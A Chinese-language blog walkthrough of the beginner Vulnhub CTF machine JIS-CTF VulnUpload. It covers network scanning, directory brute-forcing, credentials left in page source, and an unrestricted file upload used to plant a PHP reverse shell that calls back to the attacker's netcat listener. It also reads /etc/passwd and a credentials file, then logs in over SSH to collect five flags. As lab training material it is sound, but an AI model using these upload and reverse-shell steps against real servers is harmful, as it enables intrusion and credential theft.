VM - JIS-CTF-VulnUpload-CTF01 的破解
本文主要記錄對 JIS-CTF-VulnUpload-CTF01 的滲透學習過程,測試的 VM 主機主要來源 www.vulnhub.com
部落格集:面向 CTF 的 VM 破解系列
下載連結:JIS-CTF-VulnUpload-CTF01
VM - JIS-CTF-VulnUpload-CTF01 的破解
2019年4月13日19:19:03 【原創】
1. 官方描述
VM Name: JIS-CTF : VulnUpload
名字:JIS-CTF : VulnUpload
Difficulty: Beginner
難度:初學者
Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags.
描述:這個機器有五個flag,嘗試發現他們,發現所有 flag 平均耗時1.5小時。
Only working with VirtualBox
只能工作在 VirtualBox 中。
我測試在 vmware 中無法 DHCP 獲取到 IP
2. Workthrough
首先探測目標主機的 IP,檢視自己的IP為 192.168.216.3,因為是同一個網段,所以進行探測
root@kali:~# netdiscover -r 192.168.216.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.216.1 0a:00:27:00:00:18 1 60 Unknown vendor
192.168.216.2 08:00:27:eb:09:84 1 60 PCS Systemtechnik GmbH
192.168.216.4 08:00:27:3a:0a:0b 1 60 PCS Systemtechnik GmbH
發現目標IP為 192.168.216.4,下面進行埠探測
root@kali:~# nmap -p- 192.168.216.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-13 07:51 EDT
Nmap scan report for 192.168.216.4
Host is up (0.000077s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:3A:0A:0B (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds
掃描完成後,我們發現目標計算機上有兩個開啟的埠,首先探測 80 埠。使用瀏覽器可以看到介面
使用 dirb 進行目錄猜解
root@kali:~# dirb http://192.168.216.4
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Apr 13 07:55:41 2019
URL_BASE: http://192.168.216.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.216.4/ ----
==> DIRECTORY: http://192.168.216.4/admin_area/
==> DIRECTORY: http://192.168.216.4/assets/
==> DIRECTORY: http://192.168.216.4/css/
==> DIRECTORY: http://192.168.216.4/flag/
+ http://192.168.216.4/index.php (CODE:302|SIZE:1228)
==> DIRECTORY: http://192.168.216.4/js/
+ http://192.168.216.4/robots.txt (CODE:200|SIZE:160)
+ http://192.168.216.4/server-status (CODE:403|SIZE:301)
---- Entering directory: http://192.168.216.4/admin_area/ ----
+ http://192.168.216.4/admin_area/index.php (CODE:200|SIZE:224)
---- Entering directory: http://192.168.216.4/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.4/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.216.4/flag/ ----
+ http://192.168.216.4/flag/index.html (CODE:200|SIZE:109)
---- Entering directory: http://192.168.216.4/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Apr 13 07:55:49 2019
DOWNLOADED: 13836 - FOUND: 5
根據提示,檢測到五個結果。其中有一個名為 flag 的路徑值得我們注意。使用瀏覽器訪問則獲取第一個 flag
The 1st flag is : {8734509128730458630012095}
檢視頁面原始碼無有效資訊。檢視下面的目錄 admin_area,頁面中無明顯資訊,檢視頁面原始碼
可以看到第二個 flag 以及賬號密碼
<!-- username : admin
password : 3v1l_H@ck3r
The 2nd flag is : {7412574125871236547895214}
-->
我們在獲得了賬號密碼之後,嘗試登入主頁面,登入成功。返回頁面是一個檔案上傳
首先上傳幾個檔案做測試,發現 rar 和 doc 都可以上傳,猜測是沒有做過濾,下面上傳一個 php 一句話木馬(在kali 中的路徑為 /usr/share/webshells/php/php-reverse-shell.php)
# 修改如下內容,設定反彈到 kali 的 IP 上
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.216.3'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
在檔案上傳之後是不知道路徑的是,所以我們需要找到路徑。由於我們在 dirb 中知道還存在 robots.txt 檔案,所以檢視
User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag
此時看到 uploaded_files 目錄,猜測應該是存放結果的,但是頁面無顯示,檢視頁面原始碼也無法檢視。嘗試使用抓包工具,仍然抓不到包,但是可以發現頁面沒有進行跳轉,也就是說這個目錄中沒有 index.php 。所以嘗試包含上傳的原始檔名進行測試,發現頁面可以訪問,並且有報錯資訊,說明訪問成功。
下面在 kali 監聽一個 4444 埠
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
使用瀏覽器訪問
http://192.168.216.4/uploaded_files/php-reverse-shell.php
反彈成功(如果反彈不成功,請檢查上傳之前 php 檔案中的IP和埠是否設定正確)
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.216.3] from (UNKNOWN) [192.168.216.4] 40384
Linux Jordaninfosec-CTF01 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
15:32:19 up 47 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
可以看到我們顯示是 www-data 許可權,切換到網站根目錄
$ cd /var/www/html
$ ls
admin_area
assets
check_login.php
css
flag
flag.txt
hint.txt
index.php
js
login.php
logout.php
robots.txt
uploaded_files
$
可以看到存在 flag.txt 但是無法訪問,但是還存在一個可以訪問的 hint.txt 檔案
$ cat flag.txt
cat: flag.txt: Permission denied
$ cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)
The 3rd flag is : {7645110034526579012345670}
我們可以看一下都有哪些使用者
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
名為 technawi 使用者引起了我的注意。我們可以可以看一下這個使用者建立過的檔案
$ find / -user technawi -type f 2>& 1 | grep -v "Permission" | grep -v "No such"
/etc/mysql/conf.d/credentials.txt
/var/www/html/flag.txt
/home/technawi/.bash_history
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout
可以看到這個使用者的兩個檔案 /etc/mysql/conf.d/credentials.txt 和 /var/www/html/flag.txt
$ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor
cat /var/www/html/flag.txt
cat: /var/www/html/flag.txt: Permission denied
我們使用這個賬號和密碼登入系統
root@kali:~# ssh technawi@192.168.216.4
The authenticity of host '192.168.216.4 (192.168.216.4)' can't be established.
ECDSA key fingerprint is SHA256:ThPvIGqyDX2PSqt5JWHyy/J/Hy2hK5aVcpKTpkTKHQE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.216.4' (ECDSA) to the list of known hosts.
technawi@192.168.216.4's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-72-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Fri Apr 21 17:22:16 2017
technawi@Jordaninfosec-CTF01:~$
下面獲取 flag
technawi@Jordaninfosec-CTF01:~$ cd /var/www/html/
technawi@Jordaninfosec-CTF01:/var/www/html$ cat flag.txt
The 5th flag is : {5473215946785213456975249}
Good job :)
You find 5 flags and got their points and finish the first scenario....
至此,五個 flag 獲取完畢
相關文章
- VM - DerpNStink 的破解
- VM - Raven: 1 的破解
- VM - Lazysysadmin 的破解
- 面向 CTF 的 VM 破解系列
- VM - Typhoon 1.02 的破解
- VM - FourAndSix 2.01 的破解
- VM - 64Base_3mrgnc3 的破解
- VM - CH4INRULZ_v1.0.1 的破解
- VM - 6Days_Lab-v1.0.1 的破解
- 把ASM下的HDD VM轉換成ARM下Managed Disk的SSD VMASM
- Azure VM的加速網路
- Vm 增加硬碟硬碟
- [VM trunk ports]opensatck VM 單網路卡,多VLAN配置
- 在ARM模式下捕獲VM並建立新VM模式
- node核心模組-vm
- Oracle VM釋出Oracle
- JAVA VM 與DalvikJava
- docker vm 效能優劣Docker
- css vm用法介紹CSS
- VM 常用命令
- Oracle VM初識(一)Oracle
- Oracle VM初識(二)Oracle
- solaris vm create new lv
- 資料:Java HotSpot VMJavaHotSpot
- Flutter:VM snapshot must be valid. Check failed: vm. Must be able to initializeFlutterAI
- 聊聊HotSpot VM的Native Memory TrackingHotSpot
- VM中的Ubuntu(16.04)安裝tenserflowUbuntu
- 正確使用Windows Azure 中的VM RoleWindows
- limo和Dalvik VM的一個思路
- Java的破解和反破解之道 (轉)Java
- idea VM Options 設定Idea
- NodeJs VM模組詳解NodeJS
- VM軟體建立共享磁碟
- oracle VM掛載光碟機Oracle
- vm server RAC--補丁Server
- vm server RAC--IP 地址Server
- Oracle rac on vm--共享磁碟Oracle
- 處理VM的一種特殊方法和思路